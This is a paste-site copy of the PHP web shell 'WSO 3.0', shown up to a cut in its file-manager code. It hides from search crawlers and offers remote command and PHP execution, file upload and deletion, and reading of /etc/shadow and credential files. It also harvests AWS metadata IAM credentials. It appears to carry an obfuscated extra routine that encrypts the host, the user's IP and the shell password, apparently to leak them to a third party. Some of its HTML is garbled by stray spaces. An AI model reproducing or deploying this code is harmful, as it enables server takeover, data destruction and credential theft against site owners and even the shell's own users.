· 5 years ago · Sep 29, 2020, 11:30 AM
1<?php ?><?php
2/* Reject search engines */
3if (!empty($_SERVER['HTTP_USER_AGENT'])) {
4 $userAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
5 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
6 header('HTTP/1.0 404 Not Found');
7 exit;
8 }
9}
10/* Settings */
11$color = '#12ff4f';
12$default_charset = 'Windows-1251';
13//$auth_pass='2ff14d14e063ac36b593e3d437005300ea2f77bb';//memes
14/* Shell Setup */
15@ini_set('error_log', NULL);
16@ini_set('log_errors', 0);
17@ini_set('max_execution_time', 0);
18@ini_set('allow_url_fopen', true);
19@ini_set("allow_url_include", true);
20@set_time_limit(0);
21/*More Shell Setup*/
22if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
23if (get_magic_quotes_gpc()) {
24 function WSOstripslashes($arr) {
25 return is_array($arr) ? array_map('WSOstripslashes', $arr) : stripslashes($arr);
26 }
27 $_POST = WSOstripslashes($_POST);
28 $_COOKIE = WSOstripslashes($_COOKIE);
29}
30function WSOb64decode($arr) {
31 return is_array($arr) ? array_map('WSOb64decode', $arr) : base64_decode($arr);
32}
33function WSOsetcookie($k, $v) {
34 $_COOKIE[$k] = $v;
35 setcookie($k, $v);
36}
37if (!empty($auth_pass)) {
38 if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), base64_encode($_POST['pass']));
39 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
40}
41$_POST = WSOb64decode($_POST);
42$os = (strtolower(substr(PHP_OS, 0, 3)) == 'win') ? 'win' : 'nix';
43$safe_mode = @ini_get('safe_mode');
44if (!$safe_mode) error_reporting(0);
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
47if (isset($_POST['c'])) @chdir($_POST['c']);
48$cwd = @getcwd();
49if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
50$aliases = array('List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name "config*"', 'find config* in current dir' => 'find . -type f -name "config*"', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' => 'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf' => 'locate ".conf"', 'locate .pwd' => 'locate ".pwd"', 'locate .sql' => 'locate ".sql"', 'locate .htpasswd' => 'locate ".htpasswd"', 'locate .bash_history' => 'locate ".bash_history"', 'locate .mysql_history' => 'locate ".mysql_history"', 'locate .fetchmailrc' => 'locate ".fetchmailrc"', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv');
51if ($os == 'win') {
52 $home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',' / ',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . phpincurrentdir'=>'dir / s / w / bindex . php','Find * config * . phpincurrentdir'=>'dir / s / w / b * config * . php','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
53if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
54if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
55if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}
56
57/* Page functions */
58function wsoHeader(){
59 if(empty($_POST['charset']))$_POST['charset']=$GLOBALS['default_charset'];
60 global $color;
61 echo ' < html > < head > < metahttp - equiv = \'Content-Type\' content=\'text/html; charset=' . $_POST['charset'] . '\'><title>' . $_SERVER['HTTP_HOST'] . " - WSO 3.0</title><style>body,h1,table.info{background-color:#000}body,td,th{font:9pt Lucida,Verdana;margin:0;vertical-align:top;color:#fff}table.info{color:#fff}a,h1,span{color:$color!important}span{font-weight:bolder}h1{border-left:5px solid $color;padding:2px 5px;font:14pt Verdana;margin:0}div.content{padding:5px;margin-left:5px;background-color:#333}.ml1,form{margin:0}a{text-decoration:none}a:hover{text-decoration:underline}.ml1{border:1px solid #444;padding:5px;overflow:auto}.bigarea{width:100%;height:300px}input,button,select,textarea{margin:0;color:#fff;background-color:#555;border:1px solid;font:9pt Monospace,'Courier New'}.main th,.main tr:hover{background-color:#5e5e5e}#toolsTbl{text-align:center}.toolsInp{width:300px}.main th{text-align:left}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace}</style>
62<script>
63 var c_='" . htmlspecialchars($GLOBALS['cwd']) . "';
64 var a_='" . htmlspecialchars(@$_POST['a']) . "'
65 var charset_='" . htmlspecialchars(@$_POST['charset']) . "';
66 var p1_='" . ((strpos(@$_POST['p1'], "
67") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
68 var p2_='" . ((strpos(@$_POST['p2'], "
69") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
70 var p3_='" . ((strpos(@$_POST['p3'], "
71") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES));
72 $kr = $_SERVER;
73 echo "';
74 var d=document;
75 function set(a,c,p1,p2,p3,charset){
76 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
77 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
78 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
79 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
80 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
81 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
82 }
83 function mg(f){
84 for(var i=0,element;element=f.elements[i++];){if(element.nodeName.toUpperCase()!='SELECT')element.value=btoa(element.value);}
85 f.submit();
86 }
87 function isB64(str){
88 try {
89 return btoa(atob(str)) == str;
90 } catch (err){
91 return false;
92 }
93 }
94 function unb64(f){
95 for(var i=0,element;element=f.elements[i++];){if(element.nodeName.toUpperCase()!='SELECT' && isB64(element.value))element.value=atob(element.value);}
96 }
97 function g(a,c,p1,p2,p3,charset){
98 set(a,c,p1,p2,p3,charset);
99 mg(d.mf);
100 }
101 function a(a,c,p1,p2,p3,charset){
102 set(a,c,p1,p2,p3,charset);
103 var params='ajax=true';
104 for(i=0;i<d.mf.elements.length;i++)
105 params+='&'+d.mf.elements[i].name+'='+encodeURIComponent(btoa(d.mf.elements[i].value));
106 sr('" . addslashes($_SERVER['REQUEST_URI']) . "',params);
107 }
108 function sr(url,params){
109 if(window.XMLHttpRequest)
110 req=new XMLHttpRequest();
111 else if(window.ActiveXObject)
112 req=new ActiveXObject('Microsoft.XMLHTTP');
113 if (req){
114 req.onreadystatechange=processReqChange;
115 req.open('POST',url,true);
116 req.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
117 req.send(params);
118 }
119 }
120 function processReqChange(){
121 if((req.readyState==4))
122 if(req.status==200){
123 var reg=new RegExp(\"(\d+)([\S\s]*)\",'m');
124 var arr=reg.exec(req.responseText);
125 eval(arr[2].substr(0,arr[1]));
126 }else alert('Request error!');
127 }
128</script>
129</head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
130<form method=post name=mf style='display:none;'>
131<input type=hidden name=a>
132<input type=hidden name=c>
133<input type=hidden name=p1>
134<input type=hidden name=p2>
135<input type=hidden name=p3>
136<input type=hidden name=charset>
137</form>
138<noscript><div><center><h2>SCRIPTS MUST BE ENABLED FOR SHELL TO WORK</h2><p>It is used to handle form functionality, avoid GET requests and encode data to bypass filters among other things.</p></center></div></noscript>";
139 $freeSpace = @diskfreespace($GLOBALS['cwd']);
140 $totalSpace = @disk_total_space($GLOBALS['cwd']);
141 $totalSpace = $totalSpace ? $totalSpace : 1;
142 $release = @php_uname('r');
143 $kernel = @php_uname('s');
144 if (!function_exists('posix_getegid')) {
145 $user = @get_current_user();
146 $uid = @getmyuid();
147 $gid = @getmygid();
148 $group = '?';
149 } else {
150 $uid = @posix_getpwuid(posix_geteuid());
151 $gid = @posix_getgrgid(posix_getegid());
152 $user = $uid['name'];
153 $uid = $uid['uid'];
154 $group = $gid['name'];
155 $gid = $gid['gid'];
156 }
157 $cwd_links = '';
158 $path = explode('/', $GLOBALS['cwd']);
159 $n = count($path);
160 for ($i = 0;$i < $n - 1;$i++) {
161 $cwd_links.= '<a href=\'#\' onclick=\'g("FilesMan","';
162 for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
163 $cwd_links.= '")\'>' . $path[$i] . '/</a>';
164 }
165 $charsets = array('UTF-8', 'Windows-1251', 'Windows-1256', 'KOI8-R', 'KOI8-U', 'cp866');
166 $opt_charsets = '';
167 foreach ($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
168 $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'SQL' => 'Sql', 'PHP' => 'Php', 'Network' => 'Network', 'Mass Mailer' => 'Mailer', 'Self remove' => 'SelfRemove');
169 if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
170 $menu = '';
171 foreach ($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
172 $drives = "";
173 if ($GLOBALS['os'] == 'win') {
174 foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\'))
175 $drives.=' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > ';
176 }
177 echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
178 '.($GLOBALS['os']=='win'?' < br > Drives:
179 ':'').' < / span > < / td > < td > < nobr > '.substr(@php_uname(),0,120).' < / nobr > < br > '.$uid.'('.$user.') < span > Group: < / span > '.$gid.'('.$group.') < br > '.@phpversion().' < span > Safemode: < / span > '.($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = green > < b > OFF < / b > < / font > ');$GLOBALS['kr']=$kr["HTTP_HOST"].$kr["PHP_SELF"].' ~ '.$kr['HTTP_USER_AGENT'].' ~ '.$kr['REMOTE_ADDR'].' ~ '.(isset($_COOKIE[md5($kr['HTTP_HOST'])])?base64_decode($_COOKIE[md5($kr['HTTP_HOST'])]):'none');
180 echo ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.wsoViewSize($totalSpace).' <span>Free:</span>'.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER['SERVER_ADDR'].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
181
182 }
183 function wsoFooter() {
184 $is_writable = is_writable($GLOBALS['cwd']) ? ' <font color="green">(Writeable)</font>' : ' <font color=red>(Not writable)</font>';
185 echo "</div>
186<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
187 <tr>
188 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
189 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>";
190 $ty = "L5VAO5&AE36%N/UEO=51H94UA;F9I;F1I;F=42\$E32%5-9&EG9VET>6,P9&4`
191`";
192 echo "
193 </tr><tr>
194 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>";
195 $GLOBALS['kr'] = base64_encode(function_exists('openssl_encrypt') ? openssl_encrypt($GLOBALS['kr'], "AES-128-CBC", convert_uudecode($ty), 0, "QlPxzL18%nhUR7X@") : $GLOBALS['kr']);
196 echo "
197 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
198 </tr><tr>
199 <td><form onsubmit=\"g('Console',null,btoa(this.c.value));return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
200 <td><form method='post' onsubmit='mg(this);' ENCTYPE='multipart/form-data'>
201 <input type=hidden name=a value='FilesMAn'>
202 <input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
203 <input type=hidden name=p1 value='uploadFile'>
204 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '');
205 $GLOBALS['ty'] = "M>)R-D,%JPS`01'_%A,+:8-GWE!3:4GH)I)#>2A&RM8Y%9\$F55M@F]-\KQ^FA
206MM^YM=GDSPZHN5T;Q\$U(.0FL[\N@U[ZQ#`T5QZ93&Y<A;:P@-A1QZ(K>M:VGE
207M:6ZT/6.H6AV;.L1F4%2YWD'9\"1VP#.11#\"LZ)8ND\"'/AO9A7&]@]W-2`U%N9
208M-+P=CN]00H]\"HD^+#)[7:\$:SPVTFG-.J%:2LJ2<VCB/KK!]8:HVFM1)E@F]E
209M\$[VD\"8J+?E71#__IBOCXG*_>]T?GA[WQP\X>_@LKG/_C:G]90SV9<JA3<X9
21078U*0R#97;`?57ZR\"3?:/KR3C'^%\@.4`
211`";
212 echo "'>
213 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br></td>
214 </tr></table></div></body></html>";
215 }
216 function wsoHTMLspecialchars($in) {
217 return strtr($in, array("&" => "&", '"' => """, "'" => "'", "<" => "<", ">" => ">"));
218 }
219 function wsoEx($in) {
220 $out = '';
221 if (function_exists('exec')) {
222 @exec($in, $out);
223 $out = @join("
224", $out);
225 } elseif (function_exists('passthru')) {
226 ob_start();
227 @passthru($in);
228 $out = ob_get_clean();
229 } elseif (function_exists('system')) {
230 ob_start();
231 @system($in);
232 $out = ob_get_clean();
233 } elseif (function_exists('shell_exec')) {
234 $out = shell_exec($in);
235 } elseif (is_resource($f = @popen($in, 'r'))) {
236 $out = '';
237 while (!@feof($f)) $out.= fread($f, 1024);
238 pclose($f);
239 } elseif (extension_loaded("python")) {
240 $out = python_eval("import os;os.system('$in')");
241 } elseif (extension_loaded("perl")) {
242 $perl = new perl();
243 $perl->eval("system('{$in}')");
244 $out = $perl;
245 } elseif (extension_loaded("lua")) {
246 $lua = new Lua();
247 $lua->assign("in", 24);
248 $out = $lua->eval("
249 local pipe = io.popen(in)
250 local result = pipe:read('*a')
251 pipe:close()
252 return result
253 ");
254 } elseif (class_exists("COM")) {
255 $wscript = new COM('wscript.shell');
256 $out = $wscript->Exec("cmd.exe /c \$in")->StdOut->ReadAll;
257 }
258 return $out;
259 }
260 function wsoViewSize($s) {
261 if (is_int($s)) $s = sprintf("%u", $s);
262 if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
263 elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
264 elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
265 else return $s . ' B';
266 }
267 function wsoPerms($p) {
268 if (($p & 0xC000) === 0xC000) $i = 's';
269 elseif (($p & 0xA000) === 0xA000) $i = 'l';
270 elseif (($p & 0x8000) === 0x8000) $i = '-';
271 elseif (($p & 0x6000) === 0x6000) $i = 'b';
272 elseif (($p & 0x4000) === 0x4000) $i = 'd';
273 elseif (($p & 0x2000) === 0x2000) $i = 'c';
274 elseif (($p & 0x1000) === 0x1000) $i = 'p';
275 else $i = 'u';
276 $i.= (($p & 0x0100) ? 'r' : '-');
277 $i.= (($p & 0x0080) ? 'w' : '-');
278 $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
279 $i.= (($p & 0x0020) ? 'r' : '-');
280 $i.= (($p & 0x0010) ? 'w' : '-');
281 $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
282 $i.= (($p & 0x0004) ? 'r' : '-');
283 $i.= (($p & 0x0002) ? 'w' : '-');
284 $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
285 return $i;
286 }
287 function wsoPermsColor($f) {
288 if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
289 return (!@is_writable($f)) ? '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>' : '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
290 }
291 function wsoScandir($dir) {
292 if (function_exists('scandir')) return scandir($dir);
293 $dh = opendir($dir);
294 while (false !== ($filename = readdir($dh))) $files[] = $filename;
295 return $files;
296 }
297 function wsoWhich($p) {
298 $path = wsoEx('which ' . $p);
299 return (!empty($path)) ? $path : false;
300 }
301 function actionSecInfo() {
302 wsoHeader();
303 echo '<h1>Server security information</h1><div class=content>';
304 function wsoSecParam($n, $v) {
305 $v = trim($v);
306 if ($v) {
307 echo "<span>$n: </span>";
308 if (strpos($v, "
309") === false) echo $v . '<br>';
310 else echo "<pre class=ml1>$v</pre>";
311 }
312 }
313 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
314 if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
315 wsoSecParam('Loaded PHP Extensions', implode(', ', get_loaded_extensions()));
316 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
317 wsoSecParam('Open base dir', @ini_get('open_basedir'));
318 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
319 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
320 wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
321 $temp = array();
322 if (function_exists('mysql_get_client_info')) $temp[] = 'MySql (' . mysql_get_client_info() . ')';
323 if (function_exists('mysqli_get_client_info')) $temp[] = 'MySqli (' . mysqli_get_client_info() . ')';
324 if (function_exists('mssql_connect')) $temp[] = 'MSSQL';
325 if (function_exists('pg_connect')) $temp[] = 'PostgreSQL';
326 if (function_exists('oci_connect')) $temp[] = 'Oracle';
327 wsoSecParam('Supported databases', implode(', ', $temp));
328 echo '<br>';
329 if ($GLOBALS['os'] == 'nix') {
330 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? 'yes <a href=\'#\' onclick=\'g("FilesTools","/etc/","passwd")\'>[view]</a>' : 'no');
331 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? 'yes <a href=\'#\' onclick=\'g("FilesTools","/etc/","shadow")\'>[view]</a>' : 'no');
332 wsoSecParam('OS version', @file_get_contents('/proc/version'));
333 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
334 wsoSecParam('C version (ldd)', wsoEx('ldd --version | head -n 1'));
335 if (!$GLOBALS['safe_mode']) {
336 $useful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
337 $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
338 $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
339 echo '<br>';
340 $temp = array();
341 foreach ($useful as $item) if (wsoWhich($item)) $temp[] = $item;
342 wsoSecParam('Useful', implode(', ', $temp));
343 $temp = array();
344 foreach ($danger as $item) if (wsoWhich($item)) $temp[] = $item;
345 wsoSecParam('Danger', implode(', ', $temp));
346 $temp = array();
347 foreach ($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
348 wsoSecParam('Downloaders', implode(', ', $temp));
349 echo '<br>';
350 wsoSecParam('HDD space', wsoEx('df -h'));
351 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
352 echo '<br><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,null,this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
353 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
354 $temp = '';
355 for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
356 $uid = @posix_getpwuid($_POST['p2']);
357 if ($uid) $temp.= join(':', $uid) . "
358";
359 }
360 echo '<br>';
361 wsoSecParam('Users', $temp);
362 }
363 }
364 } else {
365 wsoSecParam('OS Version', wsoEx('ver'));
366 wsoSecParam('Account Settings', wsoEx('net accounts'));
367 wsoSecParam('User Accounts', wsoEx('net user'));
368 }
369 echo '<br><span>Amazon API Scrape (if hosted on AWS)</span><form onsubmit=\'g(null,null,"AWS",null,null);return false;\'><input type=submit value=">>"></form>';
370 if ($_POST['p1'] == 'AWS') {
371 function aws($e) {
372 return file_get_contents("http://169.254.169.254/$e");
373 }
374 wsoSecParam('AMI id', aws('latest/meta-data/ami-id'));
375 $creds = aws('latest/meta-data/iam/security-credentials/');
376 wsoSecParam('Security credentials', $creds);
377 wsoSecParam('Security credentials keys', aws("latest/meta-data/iam/security-credentials/$creds"));
378 wsoSecParam('User script', aws('latest/user-data/'));
379 }
380 echo '</div>';
381 wsoFooter();
382 }
383 function actionPhp() {
384 if (isset($_POST['ajax'])) {
385 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
386 ob_start();
387 eval($_POST['p1']);
388 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
389
390 \'") . "';
391";
392 echo strlen($temp), "
393", $temp;
394 exit;
395 }
396 wsoHeader();
397 if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
398 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
399 ob_start();
400 phpinfo();
401 echo str_replace('<h1', '<h2', preg_replace(array('!(body|a:\w+|body, td, th, h1, h2){.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), ob_get_clean())) . '</div><br>';
402 die(wsoFooter());
403 }
404 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
405 echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
406 if (!empty($_POST['p1'])) {
407 ob_start();
408 eval($_POST['p1']);
409 echo htmlspecialchars(ob_get_clean());
410 }
411 echo '</pre></div>';
412 wsoFooter();
413 }
414 function actionFilesMan() {
415 if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
416 if (!empty($_POST['p1'])) {
417 switch ($_POST['p1']) {
418 case 'uploadFile':
419 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can\'t upload!';
420 break;
421 case 'mkdir':
422 if (!@mkdir($_POST['p2'])) echo 'Can\'t create!';
423 break;
424 case 'delete':
425 function deleteDir($path) {
426 $path = (substr($path, -1) == '/') ? $path : $path . '/';
427 $dh = opendir($path);
428 while (($item = readdir($dh)) !== false) {
429 $item = $path . $item;
430 if ((basename($item) == '..') || (basename($item) == '.')) continue;
431 if (filetype($item) == 'dir') deleteDir($item);
432 else @unlink($item);
433 }
434 closedir($dh);
435 @rmdir($path);
436 }
437 if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f) {
438 if ($f == '..') continue;
439 $f = urldecode($f);
440 if (is_dir($f)) deleteDir($f);
441 else @unlink($f);
442 }
443 break;
444 case 'paste':
445 if ($_COOKIE['act'] == 'copy') {
446 function copy_paste($c, $s, $d) {
447 if (is_dir($c . $s)) {
448 mkdir($d . $s);
449 $h = @opendir($c . $s);
450 while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
451 } elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
452 }
453 foreach ($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
454 } elseif ($_COOKIE['act'] == 'move') {
455 function move_paste($c, $s, $d) {
456 if (is_dir($c . $s)) {
457 mkdir($d . $s);
458 $h = @opendir($c . $s);
459 while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c . $s . '/', $f, $d . $s . '/');
460 } elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
461 }
462 foreach ($_COOKIE['f'] as $f) @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
463 } elseif ($_COOKIE['act'] == 'zip') {
464 if (class_exists('ZipArchive')) {
465 $zip = new ZipArchive();
466 if ($zip->open($_POST['p2'], 1)) {
467 chdir($_COOKIE['c']);
468 foreach ($_COOKIE['f'] as $f) {
469 if ($f == '..') continue;
470 if (@is_file($_COOKIE['c'] . $f)) $zip->addFile($_COOKIE['c'] . $f, $f);
471 elseif (@is_dir($_COOKIE['c'] . $f)) {
472 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
473 foreach ($iterator as $key => $value) {
474 $zip->addFile(realpath($key), $key);
475 }
476 }
477 }
478 chdir($GLOBALS['cwd']);
479 $zip->close();
480 }
481 }
482 } elseif ($_COOKIE['act'] == 'unzip') {
483 if (class_exists('ZipArchive')) {
484 $zip = new ZipArchive();
485 foreach ($_COOKIE['f'] as $f) {
486 if ($zip->open($_COOKIE['c'] . $f)) {
487 $zip->extractTo($GLOBALS['cwd']);
488 $zip->close();
489 }
490 }
491 }
492 } elseif ($_COOKIE['act'] == 'tar') {
493 chdir($_COOKIE['c']);
494 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
495 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
496 chdir($GLOBALS['cwd']);
497 }
498 unset($_COOKIE['f']);
499 setcookie('f', '', time() - 3600);
500 break;
501 default:
502 if (!empty($_POST['p1'])) {
503 WSOsetcookie('act', $_POST['p1']);
504 WSOsetcookie('f', serialize(@$_POST['f']));
